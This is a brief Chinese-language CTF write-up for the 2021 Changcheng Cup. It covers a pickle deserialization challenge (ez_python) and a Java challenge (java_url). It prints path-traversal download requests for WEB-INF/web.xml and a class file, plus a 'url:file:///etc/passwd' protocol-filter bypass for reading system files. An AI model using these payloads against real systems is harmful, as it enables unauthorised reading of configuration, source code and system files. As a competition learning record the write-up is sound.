2021长城杯
ez_python
import pickle |
定位一下关键函数pickle
考点就呼之欲出了pickle反序列化绕过r字符
user = pickle.loads(user) |
有现成的链子可以直接打
import requests |
java_url
java项目下都有一个配置文件可以下载
/download?filename=../../../../WEB-INF/web.xml |
然后就可以拿到很多路由
接下来下载源码
/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/testURL.class |
在审计源码的时候可以看到
String pri = tartget_url.substring(0, tartget_url.indexOf(":")); |
第一个冒号前不可以是以下三种协议,所以要找一个放在file协议前面,却又不会报错的
url:file:///etc/passwd |
这样就可以了